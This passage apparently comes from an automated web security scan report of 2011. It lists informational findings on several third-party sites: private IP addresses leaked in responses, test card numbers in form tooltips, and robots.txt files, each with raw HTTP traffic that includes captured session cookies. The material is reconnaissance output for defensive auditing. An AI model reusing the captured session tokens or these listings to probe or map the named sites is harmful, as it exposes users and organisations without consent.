X-FB-Server: 10.55.1.58
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 7909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.28. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14dc33a4%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff3dd58e0a8%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.41
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:44 GMT
Content-Length: 7739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.29. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.216.41
X-Cnection: close
Date: Fri, 24 Jun 2011 13:32:35 GMT
Content-Length: 9136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.30. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.177.32
X-Cnection: close
Date: Fri, 24 Jun 2011 13:27:59 GMT
Content-Length: 9128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.31. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php?u=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F%23.TgSOp6MNlm8.facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.214.39
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:34 GMT
Content-Length: 0

23.32. http://www.google.com/sdch/vD843DpA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I
If-Modified-Since: Thu, 23 Jun 2011 23:11:05 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Fri, 24 Jun 2011 05:19:33 GMT
Date: Fri, 24 Jun 2011 13:26:11 GMT
Expires: Fri, 24 Jun 2011 13:26:11 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&amp;q=related: http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &amp;rct=j&amp;sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google
...[SNIP]...
<a href="/search?hl=en&amp;q=related:http://172.31.196.197:8888/search?q=cache: &amp;cd= &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...
23.33. http://www.metlife.com/system/css/components_home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/css/components_home.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /system/css/components_home.css HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: siscweb=XUPOLRS172.24.35.19CKMQQ; path=/
Last-Modified: Sat, 14 May 2011 03:10:35 GMT
Content-Type: text/css
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:22 GMT
Vary: Accept-Encoding
Content-Length: 25960

@import url(/system/css/rcpromo.css);
/*------------------------------Banner-------------------------------------*/
#ctBanner img
{
   display: block;
   border:0px;
}
/*---------------------------
...[SNIP]...
23.34. http://www.metlife.com/system/css/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/css/global.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /system/css/global.css HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: siscweb=XUPOLRS172.24.35.23CKMOL; path=/
Last-Modified: Sat, 14 May 2011 03:10:35 GMT
Content-Type: text/css
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:22 GMT
Vary: Accept-Encoding
Content-Length: 62255

@import url(/system/css/reset.css);
@import url(/system/css/components.css);

/* Defaults */
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 81.25%; /* 13 px or 81.25% */
line-h
...[SNIP]...
23.35. http://www.metlife.com/system/js/vendor/optimost.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/js/vendor/optimost.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /system/js/vendor/optimost.js HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: siscweb=XUPOLRS172.24.35.20CKMOU; path=/
Last-Modified: Sat, 14 May 2011 02:50:18 GMT
Content-Type: application/x-javascript
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:22 GMT
Vary: Accept-Encoding
Content-Length: 2154

// OPTIMOST PAGE CODE V2.7 - Copyright 2002-2009 Interwoven, Inc.
var optimost={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"tex
...[SNIP]...
24. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

24.1. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/conf/86/lang/en.js

Issue detail

The following credit card number was disclosed in the response:

Request

GET /store/conf/86/lang/en.js HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://softlayer.parallelsmarketplace.com/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; PHPSESSID=6a9429b7d6c03539695bbec853449bea

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 08 Dec 2010 01:14:07 GMT
ETag: "2270473-86d2-d67775c0"
Accept-Ranges: bytes
Content-Length: 34514
Content-Type: application/x-javascript
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

var locale = {
'&datetime_format_date':'%d-%m-%Y ',
'ACCOUNTNAME':'(e.g.: John) ',
'ACCOUNT_NAME':'Account Name ',
'ACCOUNT_NUMBER':'Account Number ',
'ACN_ABN':'A.C.N / A.B.N ',
'ADDITIONAL_PARAMETER
...[SNIP]...
(e.g.: 1234) ',
'TOOLTIP_CREDIT_CARD_CVV':'(e.g.: 123) ',
'TOOLTIP_CREDIT_CARD_HOLDER_NAME':'(e.g.: JOHN SMITH) ',
'TOOLTIP_CREDIT_CARD_ISSUE_NUMBER':'(e.g.: 2) ',
'TOOLTIP_CREDIT_CARD_NUMBER':'(e.g.: 4111111111111111) ',
'TOOLTIP_EMAIL':'(e.g.: tech_user@plates.com) ',
'TOOLTIP_EMAIL2':'(e.g.: tech_user@plates.com) ',
'TOOLTIP_EXP_DATE':' ',
'TOOLTIP_FIRST_NAME':'(e.g.: John) ',
'TOOLTIP_FIRST_NAME_ENG':'(e.g.: Jo
...[SNIP]...
24.2. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The following credit card number was disclosed in the response:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div class="fieldComment">(e.g.: 4111111111111111) </div>
...[SNIP]...
25. Robots.txt file  previous  next
There are 26 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

25.1. http://609167.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://609167.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 609167.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sat, 25 Jun 2011 02:10:58 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
25.2. http://a.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:59 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
25.3. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
25.4. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Fri, 24 Jun 2011 13:18:33 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 24 Jun 2011 13:18:33 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /
25.5. http://adclick.g.doubleclick.net/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adclick.g.doubleclick.net
Path:   /aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adclick.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 24 Jun 2011 13:22:37 GMT
Server: AdClickServer
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
25.6. http://apnxscm.ac3.msn.com:81/CACMSH.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apnxscm.ac3.msn.com:81
Path:   /CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Sat, 25 Jun 2011 13:18:54 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 24 Jun 2011 13:18:53 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /
25.7. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beta.telkom.co.id

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:10 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
Last-Modified: Thu, 02 Apr 2009 03:08:21 GMT
ETag: "b-14a-be979340"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_files/
